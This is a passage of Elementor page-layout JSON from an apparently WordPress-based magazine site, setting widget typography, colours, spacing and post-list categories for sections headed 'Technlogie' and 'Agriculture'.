size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\